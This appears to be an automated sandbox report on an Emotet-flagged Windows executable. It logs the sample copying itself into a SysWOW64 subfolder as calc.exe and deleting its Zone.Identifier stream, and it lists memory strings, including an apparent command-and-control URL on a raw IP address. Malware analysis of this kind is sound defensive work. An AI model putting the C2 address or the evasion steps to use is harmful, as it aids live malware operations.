                Source: svchost.exe, 00000008.00000003.304712761.000001B8A2C40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000008.00000003.282748250.000001B8A2C31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000008.00000003.282748250.000001B8A2C31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000008.00000002.304836563.000001B8A2C13000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen6
                Source: calc.exe, 00000001.00000002.507116463.0000000002573000.00000004.00000001.sdmpString found in binary or memory: http://47.36.140.164/BiRnSEbQidy6zY/IHZNRG0LdgOvnHD7h1/LPv7QD8SWPFeI9n/VlM63SymTHHvqch/HEdP9rq3H7Lb/
                Source: svchost.exe, 00000003.00000002.508684218.00000202E100F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: svchost.exe, 00000003.00000002.508684218.00000202E100F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000003.00000002.508684218.00000202E100F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000003.00000002.508237407.00000202E0E50000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: svchost.exe, 00000008.00000002.304836563.000001B8A2C13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000008.00000003.304698673.000001B8A2C49000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000008.00000002.304875218.000001B8A2C52000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000008.00000003.304727348.000001B8A2C41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000008.00000003.304727348.000001B8A2C41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000008.00000003.304712761.000001B8A2C40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000008.00000003.304698673.000001B8A2C49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000008.00000002.304881320.000001B8A2C5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000008.00000002.304881320.000001B8A2C5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000008.00000002.304885191.000001B8A2C61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000008.00000003.282748250.000001B8A2C31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000008.00000002.304836563.000001B8A2C13000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000008.00000003.304712761.000001B8A2C40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000008.00000003.304712761.000001B8A2C40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000008.00000003.282748250.000001B8A2C31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000008.00000003.282748250.000001B8A2C31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000008.00000002.304836563.000001B8A2C13000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen6
                Source: QgWIrI5nvn.exe, 00000000.00000002.239946887.000000000085A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: QgWIrI5nvn.exe, 00000000.00000002.239946887.000000000085A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00432EF6 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00432EF6
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0042F52E GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0042F52E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00432EF6 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00432EF6
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0042F52E GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0042F52E
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_00432EF6 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_00432EF6
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_0042F52E GetKeyState,GetKeyState,GetKeyState,GetKeyState,1_2_0042F52E

                E-Banking Fraud:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000000.00000002.239888094.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.506147931.0000000000611000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.506045325.00000000005F4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.239926495.0000000000831000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.505938111.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.239911370.0000000000814000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.QgWIrI5nvn.exe.830000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.calc.exe.610000.2.unpack, type: UNPACKEDPE
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile created: C:\Windows\SysWOW64\udhisapi\Jump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile created: C:\Windows\SysWOW64\udhisapi\Jump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile deleted: C:\Windows\SysWOW64\udhisapi\calc.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile deleted: C:\Windows\SysWOW64\udhisapi\calc.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0043456A0_2_0043456A
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040BA2C0_2_0040BA2C
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040FB950_2_0040FB95
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_008381B00_2_008381B0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00837DD00_2_00837DD0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_008365000_2_00836500
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_008375600_2_00837560
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00833AF00_2_00833AF0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00831C900_2_00831C90
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00833C100_2_00833C10
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00833DF00_2_00833DF0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00833E170_2_00833E17
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D90FE0_2_007D90FE
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D809E0_2_007D809E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D568E0_2_007D568E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D57AE0_2_007D57AE
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D382E0_2_007D382E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D996E0_2_007D996E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D59B50_2_007D59B5
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D598E0_2_007D598E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D9D4E0_2_007D9D4E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0043456A0_2_0043456A
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040BA2C0_2_0040BA2C
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040FB950_2_0040FB95
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_008381B00_2_008381B0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00837DD00_2_00837DD0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_008365000_2_00836500
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_008375600_2_00837560
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00833AF00_2_00833AF0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00831C900_2_00831C90
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00833C100_2_00833C10
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00833DF00_2_00833DF0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00833E170_2_00833E17
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D90FE0_2_007D90FE
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D809E0_2_007D809E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D568E0_2_007D568E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D57AE0_2_007D57AE
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D382E0_2_007D382E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D996E0_2_007D996E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D59B50_2_007D59B5
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D598E0_2_007D598E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D9D4E0_2_007D9D4E
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_0043456A1_2_0043456A
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_0040BA2C1_2_0040BA2C
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_0040FB951_2_0040FB95
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: String function: 0040D9BC appears 65 times
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: String function: 0040BF04 appears 94 times
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: String function: 0040EFF6 appears 41 times
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: String function: 0040D9BC appears 65 times
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: String function: 0040BF04 appears 94 times
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: String function: 0040EFF6 appears 41 times
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: String function: 0040D9BC appears 65 times
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: String function: 0040BF04 appears 94 times
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: String function: 0040EFF6 appears 41 times
                Source: QgWIrI5nvn.exeBinary or memory string: OriginalFilename vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.240208812.0000000002690000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.239888094.00000000007D0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamexwizard.exej% vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.240663521.0000000002DF0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.240663521.0000000002DF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.239758680.0000000000489000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameColorBoxSample.EXEV vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exeBinary or memory string: OriginalFilenameColorBoxSample.EXEV vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exeBinary or memory string: OriginalFilename vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.240208812.0000000002690000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.239888094.00000000007D0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamexwizard.exej% vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.240663521.0000000002DF0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.240663521.0000000002DF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.239758680.0000000000489000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameColorBoxSample.EXEV vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exeBinary or memory string: OriginalFilenameColorBoxSample.EXEV vs QgWIrI5nvn.exe
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                Source: classification engineClassification label: mal92.troj.evad.winEXE@15/5@0/2
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00409468 __EH_prolog,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance,0_2_00409468
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00409468 __EH_prolog,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance,0_2_00409468
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00430785 FindResourceA,LoadResource,LockResource,FreeResource,0_2_00430785
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00430785 FindResourceA,LoadResource,LockResource,FreeResource,0_2_00430785
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00834F20 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,0_2_00834F20
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00834F20 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,0_2_00834F20
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4416:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4416:120:WilError_01
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: @u@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: @u@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCommand line argument: Hu@0_2_007E1BE7
                Source: QgWIrI5nvn.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: QgWIrI5nvn.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: QgWIrI5nvn.exeVirustotal: Detection: 52%
                Source: QgWIrI5nvn.exeMetadefender: Detection: 43%
                Source: QgWIrI5nvn.exeReversingLabs: Detection: 62%
                Source: QgWIrI5nvn.exeVirustotal: Detection: 52%
                Source: QgWIrI5nvn.exeMetadefender: Detection: 43%
                Source: QgWIrI5nvn.exeReversingLabs: Detection: 62%
                Source: unknownProcess created: C:\Users\user\Desktop\QgWIrI5nvn.exe 'C:\Users\user\Desktop\QgWIrI5nvn.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\udhisapi\calc.exe C:\Windows\SysWOW64\udhisapi\calc.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeProcess created: C:\Windows\SysWOW64\udhisapi\calc.exe C:\Windows\SysWOW64\udhisapi\calc.exeJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\QgWIrI5nvn.exe 'C:\Users\user\Desktop\QgWIrI5nvn.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\udhisapi\calc.exe C:\Windows\SysWOW64\udhisapi\calc.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeProcess created: C:\Windows\SysWOW64\udhisapi\calc.exe C:\Windows\SysWOW64\udhisapi\calc.exeJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: Binary string: xwizard.pdb source: QgWIrI5nvn.exe
                Source: Binary string: xwizard.pdb source: QgWIrI5nvn.exe
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0043809A __EH_prolog,LoadLibraryA,GetProcAddress,0_2_0043809A
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0043809A __EH_prolog,LoadLibraryA,GetProcAddress,0_2_0043809A
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040C244 push eax; retn 0040h0_2_0040C245
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040D9F7 push ecx; ret 0_2_0040DA07
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040BB40 push eax; ret 0_2_0040BB54
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040BB40 push eax; ret 0_2_0040BB7C
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040BF04 push eax; ret 0_2_0040BF22
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835CA0 push ecx; mov dword ptr [esp], 0000ECEBh0_2_00835CA1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835CF0 push ecx; mov dword ptr [esp], 0000DEB7h0_2_00835CF1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835C40 push ecx; mov dword ptr [esp], 00004180h0_2_00835C41
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835DB0 push ecx; mov dword ptr [esp], 0000F636h0_2_00835DB1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835D50 push ecx; mov dword ptr [esp], 000097F2h0_2_00835D51
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835E80 push ecx; mov dword ptr [esp], 00002BE4h0_2_00835E81
